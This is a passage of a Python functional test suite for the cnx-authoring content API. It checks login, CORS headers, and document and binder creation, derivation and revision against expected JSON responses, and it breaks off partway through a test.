# See LICENCE.txt for details.
# ###
"""Functional tests of API."""
import datetime
import json
import os
import sys
import re
import unittest
from copy import deepcopy
try:
from unittest import mock # python 3
except ImportError:
import mock # python 2
try:
import urllib.request as urllib2 # renamed in python3
except ImportError:
import urllib2 # noqa python2
try:
from urllib.parse import urljoin
except ImportError:
from urlparse import urljoin
import cnxepub
import psycopg2
import pytz
import requests
from webtest import Upload
from wsgi_intercept import requests_intercept
from .intercept import (install_intercept, uninstall_intercept,
publishing_settings)
from .testing import integration_test_settings, get_data
from ..models import DEFAULT_LICENSE, TZINFO
USER_PROFILE = {
u'username': u'user1',
u'id': 1,
u'first_name': u'User',
u'last_name': u'One',
}
SUBMITTER = {
u'id': u'user1',
u'firstname': u'User',
u'surname': u'One',
u'fullname': u'User One',
u'type': u'cnx-id',
}
SUBMITTER_WITH_ACCEPTANCE = SUBMITTER.copy()
SUBMITTER_WITH_ACCEPTANCE[u'hasAccepted'] = True
SUBMITTER_WITH_ACCEPTANCE[u'requester'] = SUBMITTER['id']
class BaseFunctionalTestCase(unittest.TestCase):
accounts_request_return = ''
maxDiff = None
@classmethod
def setUpClass(cls):
cls.settings = settings = integration_test_settings()
# only run once for all the tests
# Install the intercept for archive and publishing.
install_intercept()
requests_intercept.install()
# make sure storage is set correctly in cnxauthoring.views by reloading
# cnxauthoring.views
if 'cnxauthoring.views' in sys.modules:
del sys.modules['cnxauthoring.views']
from .. import main
app = main({}, **settings)
from webtest import TestApp
cls.testapp = TestApp(app)
# Allow user1 to publish without moderation
with psycopg2.connect(
publishing_settings()['db-connection-string']) as db_conn:
with db_conn.cursor() as cursor:
cursor.execute("""\
INSERT INTO users
(username, first_name, last_name, is_moderated)
VALUES ('user1', 'User', 'One', true)""")
@classmethod
def tearDownClass(cls):
from ..storage import storage
if hasattr(storage, 'conn'):
storage.conn.close()
# Uninstall the intercept for archive and publishing.
requests_intercept.uninstall()
uninstall_intercept()
def setUp(self):
# All tests start with a login.
self.login()
self.addCleanup(self.logout)
def login(self, username='user1', password='password', login_url='/login',
headers=None):
headers = headers or {}
response = self.testapp.get(login_url, headers=headers, status=302)
response = self.testapp.post(response.headers['Location'], {
'username': username,
'password': password,
})
return self.testapp.get(response.headers['Location'])
def logout(self):
self.testapp.get('/logout', status=302)
def assert_cors_headers(self, response, cache_message_special_case=None):
self.assertEqual(response.headers['Access-Control-Allow-Credentials'],
'true')
self.assertEqual(response.headers['Access-Control-Allow-Origin'],
'http://localhost:8000')
self.assertEqual(response.headers['Access-Control-Allow-Headers'],
'Origin, Content-Type')
self.assertEqual(response.headers['Access-Control-Allow-Methods'],
'GET, OPTIONS, PUT, POST')
cache_header_dictionary = {
'201 Created':
['max-age=0, must-revalidate, no-cache, no-store, public'],
'200 OK':
['max-age=0, must-revalidate, no-cache, no-store, public'],
'400 Bad Request': [],
'302 Found': [],
'401 Unauthorized': [],
'403 Forbidden': [],
'404 Not Found': [],
}
try:
expected_cache_header = cache_header_dictionary[response.status]
except KeyError:
expected_cache_header = "NO EXPECTED CACHE HEADER"
actual_cache_header = response.headers.getall('Cache-Control')
if cache_message_special_case:
self.assertEqual(actual_cache_header, cache_message_special_case)
else:
self.assertEqual(actual_cache_header, expected_cache_header)
class FunctionalTests(BaseFunctionalTestCase):
def test_options(self):
self.testapp.options('/', status=404)
self.testapp.options('/some-random.html', status=404)
urls = ['/*', '/login', '/logout', '/callback',
'/contents/uuid@draft.json', '/resources/hash',
'/contents', '/resources', '/users/search',
'/users/profile', '/users/contents', '/users/contents/search']
for url in urls:
response = self.testapp.options(url, status=200)
self.assert_cors_headers(
response, cache_message_special_case=['public'])
self.assertEqual(response.headers['Content-Length'], '0')
def test_get_content_401(self):
self.logout()
response = self.testapp.get('/contents/1234abcde@draft.json',
status=401)
self.assert_cors_headers(response)
def test_get_content_404(self):
response = self.testapp.get('/contents/1234abcde@draft.json',
status=404)
self.assert_cors_headers(response)
def test_get_content_403(self):
response = self.testapp.post_json(
'/users/contents',
{'title': 'My New Document'}, status=201)
content = response.json
with mock.patch('cnxauthoring.models.Document.__acl__') as acl:
acl.return_value = ()
response = self.testapp.get(
'/contents/{}@draft.json'
.format(content['id']), status=403)
self.assertTrue('You do not have permission to view'
in response.body.decode('utf-8'))
response = self.testapp.post_json('/users/contents', {
'title': 'My New Binder',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [],
},
}, status=201)
content = response.json
with mock.patch('cnxauthoring.models.Binder.__acl__') as acl:
acl.return_value = ()
response = self.testapp.get(
'/contents/{}@draft.json'
.format(content['id']), status=403)
self.assertTrue('You do not have permission to view'
in response.body.decode('utf-8'))
def test_get_content_for_document(self):
now = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents', {
'title': 'My New Document',
'created': u'2014-03-13T15:21:15-05:00',
'revised': u'2014-03-13T15:21:15-05:00',
}, status=201)
put_result = response.json
response = self.testapp.get('/contents/{}@draft.json'.format(
put_result['id']), status=200)
get_result = response.json
submitter_w_assign_date = SUBMITTER_WITH_ACCEPTANCE.copy()
submitter_w_assign_date['assignmentDate'] = now.astimezone(
TZINFO).isoformat()
self.assertEqual(get_result, {
u'id': get_result['id'],
u'title': u'My New Document',
u'containedIn': [],
u'content': u'',
u'created': get_result['created'],
u'derivedFrom': None,
u'derivedFromTitle': None,
u'derivedFromUri': None,
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'revised': get_result['revised'],
u'mediaType': u'application/vnd.org.cnx.module',
u'language': u'en',
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'abstract': u'',
u'version': u'draft',
u'subjects': [],
u'isPublishable': False,
u'publishBlockers': [u'no_content'],
u'keywords': [],
u'state': u'Draft',
u'publication': None,
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'translators': [],
u'editors': [],
u'illustrators': [],
u'printStyle': None,
})
self.assertEqual(put_result, get_result)
self.assert_cors_headers(response)
def test_post_content_401(self):
self.logout()
response = self.testapp.post('/users/contents', status=401)
self.assert_cors_headers(response)
def test_post_content_403(self):
with mock.patch('cnxauthoring.models.Document.__acl__') as acl:
acl.return_value = ()
response = self.testapp.post_json(
'/users/contents',
{'title': u'My document タイトル'}, status=403)
self.assert_cors_headers(response)
with mock.patch('cnxauthoring.models.Binder.__acl__') as acl:
acl.return_value = ()
response = self.testapp.post_json('/users/contents', {
'title': u'My book タイトル',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [],
},
}, status=403)
self.assert_cors_headers(response)
def test_post_content_invalid_json(self):
response = self.testapp.post(
'/users/contents', 'invalid json', status=400)
self.assertTrue('Invalid JSON' in response.body.decode('utf-8'))
self.assert_cors_headers(response)
def test_post_content_empty(self):
response = self.testapp.post_json(
'/users/contents', {}, status=400)
self.assertEqual(response.json, {
u'title': u'Required',
})
self.assert_cors_headers(response)
def test_post_content_empty_binder(self):
response = self.testapp.post_json('/users/contents', {
'mediaType': 'application/vnd.org.cnx.collection',
}, status=400)
self.assertEqual(response.json, {
u'title': u'Required',
u'tree': u'Required',
})
self.assert_cors_headers(response)
def test_post_content_unknown_media_type(self):
response = self.testapp.post_json('/users/contents', {
'mediaType': 'unknown-media-type',
}, status=400)
self.assertEqual(response.json, {
u'media_type': u'"unknown-media-type" is not one of '
u'application/vnd.org.cnx.module, '
u'application/vnd.org.cnx.collection',
u'title': u'Required',
})
self.assert_cors_headers(response)
def test_post_content_minimal(self):
response = self.testapp.post_json(
'/users/contents',
{'title': u'My document タイトル'}, status=201)
result = response.json
self.assertEqual(result['title'], u'My document タイトル')
self.assertEqual(result['language'], u'en')
self.assert_cors_headers(response)
response = self.testapp.get('/contents/{}@draft.json'.format(
result['id']), status=200)
self.assert_cors_headers(response)
def test_post_content_document_printStyle(self):
response = self.testapp.post_json(
'/users/contents',
{
'title': u'My document タイトル',
'printStyle': u'pdf print style string'
}, status=201)
result = response.json
self.assertEqual(result['title'], u'My document タイトル')
self.assertEqual(result['language'], u'en')
self.assertEqual(result['printStyle'], 'pdf print style string')
self.assert_cors_headers(response)
response = self.testapp.get('/contents/{}@draft.json'.format(
result['id']), status=200)
self.assert_cors_headers(response)
def test_post_content_minimal_binder(self):
response = self.testapp.post_json('/users/contents', {
'title': u'My book タイトル',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [],
},
}, status=201)
result = response.json
self.assertEqual(result['title'], u'My book タイトル')
self.assertEqual(result['language'], u'en')
self.assertEqual(result['tree'], {
u'contents': [],
u'id': '{}@draft'.format(result['id']),
u'title': result['title'],
u'isPublishable': False,
u'publishBlockers': [u'no_content'],
})
self.assert_cors_headers(response)
response = self.testapp.get(
'/contents/{}@draft.json'.format(result['id']), status=200)
result = response.json
self.assertEqual(result['title'], u'My book タイトル')
self.assertEqual(result['language'], u'en')
self.assertEqual(result['tree'], {
u'contents': [],
u'id': '{}@draft'.format(result['id']),
u'isPublishable': False,
u'publishBlockers': [u'no_content'],
u'title': result['title'],
})
self.assert_cors_headers(response)
def test_post_content_minimal_binder_with_printStyle(self):
response = self.testapp.post_json('/users/contents', {
'title': u'My book タイトル',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [],
},
'printStyle': "*PDF print style*"
}, status=201)
result = response.json
self.assertEqual(result['title'], u'My book タイトル')
self.assertEqual(result['language'], u'en')
self.assertEqual(result['tree'], {
u'contents': [],
u'id': '{}@draft'.format(result['id']),
u'title': result['title'],
u'isPublishable': False,
u'publishBlockers': [u'no_content'],
})
self.assertEqual(result['printStyle'], '*PDF print style*')
self.assert_cors_headers(response)
response = self.testapp.get(
'/contents/{}@draft.json'.format(result['id']), status=200)
result = response.json
self.assertEqual(result['title'], u'My book タイトル')
self.assertEqual(result['language'], u'en')
self.assertEqual(result['tree'], {
u'contents': [],
u'id': '{}@draft'.format(result['id']),
u'isPublishable': False,
u'publishBlockers': [u'no_content'],
u'title': result['title'],
})
self.assertEqual(result['printStyle'], '*PDF print style*')
self.assert_cors_headers(response)
def test_post_content_binder_document_not_found(self):
response = self.testapp.post_json('/users/contents', {
'title': 'Book',
'abstract': 'Book abstract',
'language': 'de',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [
{
'id': 'page@draft',
'title': 'Page one',
},
],
},
}, status=400)
self.assert_cors_headers(response)
self.assertTrue('Document Not Found: page@draft' in
response.body.decode('utf-8'))
def test_post_content_multiple(self):
post_data = [
{'title': u'My document タイトル 1'},
{'title': u'My document タイトル 2'},
]
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
self.assertEqual(len(result), 2)
self.assertEqual(result[0]['title'], u'My document タイトル 1')
self.assertEqual(result[1]['title'], u'My document タイトル 2')
self.assert_cors_headers(response)
response = self.testapp.get('/contents/{}@draft.json'.format(
result[0]['id']), status=200)
self.assert_cors_headers(response)
response = self.testapp.get('/contents/{}@draft.json'.format(
result[1]['id']), status=200)
self.assert_cors_headers(response)
def test_post_content_derived_from_not_found(self):
post_data = {'derivedFrom': u'notfound@1'}
response = self.testapp.post_json(
'/users/contents', post_data, status=400)
self.assertTrue(b'Derive failed' in response.body)
self.assert_cors_headers(response)
def test_post_content_derived_from_no_version(self):
post_data = {
'derivedFrom': u'91cb5f28-2b8a-4324-9373-dac1d617bc24',
}
now = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
content = result.pop('content')
self.assertTrue(content.startswith('<html'))
self.assertTrue(u'Lav en madplan for den kommende uge' in content)
self.assertNotIn('2011-10-05', result.pop('created'))
self.assertNotIn('2011-10-12', result.pop('revised'))
submitter_w_assign_date = SUBMITTER_WITH_ACCEPTANCE.copy()
submitter_w_assign_date['assignmentDate'] = now.astimezone(
TZINFO).isoformat()
self.assertEqual(result, {
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': result['id'],
u'derivedFrom': '{}@1'.format(post_data['derivedFrom']),
u'derivedFromTitle': u'Indkøb',
u'derivedFromUri': u'http://cnx.org/contents/{}@1'.format(
post_data['derivedFrom']),
u'title': u'Copy of Indkøb',
u'abstract': u'<div xmlns="http://www.w3.org/1999/xhtml">foo</div>',
u'language': u'da',
u'mediaType': u'application/vnd.org.cnx.module',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'subjects': [],
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': [],
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'containedIn': [],
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
response = self.testapp.get('/contents/{}@draft.json'.format(
result['id']), status=200)
result = response.json
content = result.pop('content')
self.assertTrue(u'Lav en madplan for den kommende uge' in content)
self.assertTrue(content.startswith('<html'))
self.assertTrue(result.pop('created') is not None)
self.assertTrue(result.pop('revised') is not None)
self.assertEqual(result, {
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': result['id'],
u'derivedFrom': '{}@1'.format(post_data['derivedFrom']),
u'derivedFromTitle': u'Indkøb',
u'derivedFromUri': u'http://cnx.org/contents/{}@1'.format(
post_data['derivedFrom']),
u'title': u'Copy of Indkøb',
u'abstract': u'<div xmlns="http://www.w3.org/1999/xhtml">foo</div>',
u'language': u'da',
u'mediaType': u'application/vnd.org.cnx.module',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'subjects': [],
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': [],
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'containedIn': [],
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
# Check that resources are saved
resource_path = re.search('(/resources/[^"]*)"', content).group(1)
response = self.testapp.get(resource_path, status=200)
self.assertEqual(response.content_type, 'image/jpeg')
self.assert_cors_headers(response)
def test_post_content_derived_from(self):
post_data = {
'derivedFrom': u'91cb5f28-2b8a-4324-9373-dac1d617bc24@1',
}
# Create the derived content
now = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
content = result.pop('content')
self.assertTrue(content.startswith('<html'))
self.assertTrue(u'Lav en madplan for den kommende uge' in content)
self.assertNotIn('2011-10-05', result.pop('created'))
self.assertNotIn('2011-10-12', result.pop('revised'))
submitter_w_assign_date = SUBMITTER_WITH_ACCEPTANCE.copy()
submitter_w_assign_date['assignmentDate'] = now.astimezone(
TZINFO).isoformat()
self.assertEqual(result, {
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': result['id'],
u'derivedFrom': post_data['derivedFrom'],
u'derivedFromTitle': u'Indkøb',
u'derivedFromUri': u'http://cnx.org/contents/{}'.format(
post_data['derivedFrom']),
u'title': u'Copy of Indkøb',
u'abstract': u'<div xmlns="http://www.w3.org/1999/xhtml">foo</div>',
u'language': u'da',
u'mediaType': u'application/vnd.org.cnx.module',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'subjects': [],
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': [],
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'containedIn': [],
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
response = self.testapp.get('/contents/{}@draft.json'.format(
result['id']), status=200)
result = response.json
content = result.pop('content')
self.assertTrue(u'Lav en madplan for den kommende uge' in content)
self.assertTrue(content.startswith('<html'))
self.assertTrue(result.pop('created') is not None)
self.assertTrue(result.pop('revised') is not None)
self.assertEqual(result, {
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': result['id'],
u'derivedFrom': post_data['derivedFrom'],
u'derivedFromTitle': u'Indkøb',
u'derivedFromUri': u'http://cnx.org/contents/{}'.format(
post_data['derivedFrom']),
u'title': u'Copy of Indkøb',
u'abstract': u'<div xmlns="http://www.w3.org/1999/xhtml">foo</div>',
u'language': u'da',
u'mediaType': u'application/vnd.org.cnx.module',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'subjects': [],
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': [],
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'containedIn': [],
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
# Check that resources are saved
resource_path = re.search('(/resources/[^"]*)"', content).group(1)
response = self.testapp.get(resource_path, status=200)
self.assertEqual(response.content_type, 'image/jpeg')
self.assert_cors_headers(response)
def test_post_content_derived_from_w_missing_resource(self):
post_data = {
'derivedFrom': u'a3f7c934-2a89-4baf-a9a9-a89d957586d2@1',
}
now = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
content = result.pop('content')
self.assertTrue(u'missing resource' in content)
self.assertTrue(content.startswith('<html'))
self.assertFalse('2011-10-12' in result.pop('created'))
self.assertTrue(result.pop('revised') is not None)
submitter_w_assign_date = SUBMITTER_WITH_ACCEPTANCE.copy()
submitter_w_assign_date['assignmentDate'] = now.astimezone(
TZINFO).isoformat()
self.assertEqual(result, {
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': result['id'],
u'derivedFrom': post_data['derivedFrom'],
u'derivedFromTitle': u'missing resource',
u'derivedFromUri': u'http://cnx.org/contents/{}'.format(
post_data['derivedFrom']),
u'title': u'Copy of missing resource',
u'abstract': u'',
u'language': u'en',
u'mediaType': u'application/vnd.org.cnx.module',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'subjects': [],
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': [],
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'containedIn': [],
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
response = self.testapp.get('/contents/{}@draft.json'.format(
result['id']), status=200)
result = response.json
content = result.pop('content')
self.assertTrue(u'missing resource' in content)
self.assertTrue(content.startswith('<html'))
self.assertTrue(result.pop('created') is not None)
self.assertTrue(result.pop('revised') is not None)
self.assertEqual(result, {
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': result['id'],
u'derivedFrom': post_data['derivedFrom'],
u'derivedFromTitle': u'missing resource',
u'derivedFromUri': u'http://cnx.org/contents/{}'.format(
post_data['derivedFrom']),
u'title': u'Copy of missing resource',
u'abstract': u'',
u'language': u'en',
u'mediaType': u'application/vnd.org.cnx.module',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'subjects': [],
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': [],
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'containedIn': [],
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
def test_post_content_derived_from_binder(self):
post_data = {
'derivedFrom': u'a733d0d2-de9b-43f9-8aa9-f0895036899e@1.1',
}
now = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
self.assertTrue(result.pop('revised') is not None)
self.assertTrue(result.pop('created') is not None)
self.assertTrue(result.pop('abstract') is not None)
submitter_w_assign_date = SUBMITTER_WITH_ACCEPTANCE.copy()
        submitter_w_assign_date[u'assignmentDate'] = now.astimezone(
            TZINFO).isoformat()
expected = {
u'areContainedPublishable': False,
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': result['id'],
u'derivedFrom': post_data['derivedFrom'],
u'derivedFromTitle': u'<span style="color:red;">Derived</span> Copy of College <i>Physics</i>',
u'derivedFromUri': u'http://cnx.org/contents/{}'.format(
post_data['derivedFrom']),
u'title': u'Copy of <span style="color:red;">Derived</span> Copy of College <i>Physics</i>',
u'content': u'',
u'language': u'en',
u'mediaType': u'application/vnd.org.cnx.collection',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': [],
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'containedIn': [],
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'printStyle': None,
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'subjects': [],
u'tree': {
u'id': u'{}@draft'.format(result['id']),
u'title': u'Copy of <span style="color:red;">Derived</span> Copy of College <i>Physics</i>',
u'isPublishable': True,
u'publishBlockers': None,
u'contents': [
{u'id': u'209deb1f-1a46-4369-9e0d-18674cf58a3e@7',
u'title': u'Preface'},
{u'id': u'8a11a2f3-0099-55ef-87bf-9725214fcd8a@1.1',
u'title': u'Introduction: The Nature of Science and Physics',
u'contents': [
{u'id': u'f3c9ab70-a916-4d8c-9256-42953287b4e9@3',
u'title': u'Introduction to Science and the Realm of Physics, Physical Quantities, and Units'},
{u'id': u'd395b566-5fe3-4428-bcb2-19016e3aa3ce@4',
u'title': u'Physics: An Introduction'},
{u'id': u'c8bdbabc-62b1-4a5f-b291-982ab25756d7@6',
u'title': u'Physical Quantities and Units'},
{u'id': u'5152cea8-829a-4aaf-bcc5-c58a416ecb66@7',
u'title': u'Accuracy, Precision, and Significant Figures'},
{u'id': u'5838b105-41cd-4c3d-a957-3ac004a48af3@5',
u'title': u'Approximation'}]},
{u'id': u'd8bd3fb3-7b7b-5cee-9f2d-839e76638459@1.1',
u'title': u"Further Applications of Newton's Laws: Friction, Drag, and Elasticity",
u'contents': [
{u'id': u'24a2ed13-22a6-47d6-97a3-c8aa8d54ac6d@2',
u'title': u'Introduction: Further Applications of Newton\u2019s Laws'},
{u'id': u'ea271306-f7f2-46ac-b2ec-1d80ff186a59@5',
u'title': u'Friction'},
{u'id': u'26346a42-84b9-48ad-9f6a-62303c16ad41@6',
u'title': u'Drag Forces'},
{u'id': u'56f1c5c1-4014-450d-a477-2121e276beca@8',
u'title': u'Elasticity: Stress and Strain'}]},
{u'id': u'f6024d8a-1868-44c7-ab65-45419ef54881@3',
u'title': u'Atomic Masses'},
{u'id': u'7250386b-14a7-41a2-b8bf-9e9ab872f0dc@2',
u'title': u'Selected Radioactive Isotopes'},
{u'id': u'c0a76659-c311-405f-9a99-15c71af39325@5',
u'title': u'Useful Inf\xf8rmation'},
{u'id': u'ae3e18de-638d-4738-b804-dc69cd4db3a3@4',
u'title': u'Glossary of Key Symbols and Notation'}]},
}
self.assertEqual(result, expected)
self.assert_cors_headers(response)
response = self.testapp.get(
'/contents/{}@draft.json'.format(result['id']), status=200)
result = response.json
self.assertTrue(result.pop('created') is not None)
self.assertTrue(result.pop('revised') is not None)
self.assertTrue(result.pop('abstract') is not None)
self.assertEqual(result, expected)
self.assert_cors_headers(response)
def test_post_content_revision_403(self):
self.logout()
self.login('user2')
post_data = {
'id': '91cb5f28-2b8a-4324-9373-dac1d617bc24@1',
'title': u"Turning DNA through resonance",
'abstract': u"Theories on turning DNA structures",
'language': u'en',
'content': u"Ding dong the switch is flipped.",
'subjects': [u'Science and Technology'],
'keywords': [u'DNA', u'resonance'],
}
response = self.testapp.post_json(
'/users/contents', post_data, status=403)
def test_post_content_revision_404(self):
post_data = {
'id': 'edf794be-28bc-4242-8ae2-b043e4dd32ef@1',
'title': u"Turning DNA through resonance",
'abstract': u"Theories on turning DNA structures",
'language': u'en',
'content': u"Ding dong the switch is flipped.",
'subjects': [u'Science and Technology'],
'keywords': [u'DNA', u'resonance'],
}
response = self.testapp.post_json(
'/users/contents', post_data, status=404)
def test_post_content_revision(self):
self.logout()
self.login('Rasmus1975')
post_data = {
'id': u'91cb5f28-2b8a-4324-9373-dac1d617bc24@1',
'title': u'Turning DNA through resonance',
'abstract': u'Theories on turning DNA structures',
'language': u'en',
'subjects': [u'Science and Technology'],
'keywords': [u'DNA', u'resonance'],
}
now = datetime.datetime.now(TZINFO)
formatted_now = now.astimezone(TZINFO).isoformat()
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
license = result.pop('license')
self.assertEqual(license['url'], DEFAULT_LICENSE.url)
original_license = result.pop('originalLicense')
self.assertEqual(original_license['url'], DEFAULT_LICENSE.url)
created = result.pop('created')
self.assertTrue(created.startswith('2011-10-05'))
revised = result.pop('revised')
self.assertEqual(revised, formatted_now)
content = result.pop('content')
self.assertTrue(u'Lav en madplan for den kommende uge' in content)
# FIXME the user info we have in archive differs from
# that here in authoring.
rasmus_user_info = {
u'firstname': u'Rasmus',
u'fullname': u'Rasmus Ruby',
u'id': u'Rasmus1975',
u'surname': u'Ruby',
u'type': u'cnx-id',
}
rasmus_role = rasmus_user_info.copy()
rasmus_role.update({
u'assignmentDate': formatted_now,
u'hasAccepted': True,
u'requester': rasmus_user_info['id'],
u'surname': None,
u'fullname': u'Rasmus de 1975',
})
self.assertEqual(result, {
u'abstract': u'Theories on turning DNA structures',
u'authors': [rasmus_role],
u'cnx-archive-uri': post_data['id'],
u'containedIn': [],
u'copyrightHolders': [rasmus_role],
u'derivedFrom': None,
u'derivedFromTitle': None,
u'derivedFromUri': None,
u'editors': [],
u'id': post_data['id'].split('@')[0],
u'illustrators': [],
u'keywords': [u'DNA', u'resonance'],
u'language': u'en',
u'licensors': [rasmus_role],
u'mediaType': u'application/vnd.org.cnx.module',
u'permissions': [u'edit', u'publish', u'view'],
u'isPublishable': True,
u'publishBlockers': None,
u'publication': None,
u'publishers': [rasmus_role],
u'state': u'Draft',
u'subjects': [u'Science and Technology'],
u'submitter': rasmus_user_info,
u'title': u'Turning DNA through resonance',
u'translators': [],
u'version': u'draft',
u'printStyle': None,
})
self.assert_cors_headers(response)
response = self.testapp.get(
'/contents/{}@draft.json'.format(result['id']), status=200)
result = response.json
content = result.pop('content')
self.assertTrue(u'Lav en madplan for den kommende uge' in content)
self.assertTrue(content.startswith('<html'))
self.assertTrue(result.pop('created') is not None)
self.assertTrue(result.pop('revised') is not None)
self.assertEqual(result, {
u'submitter': rasmus_user_info,
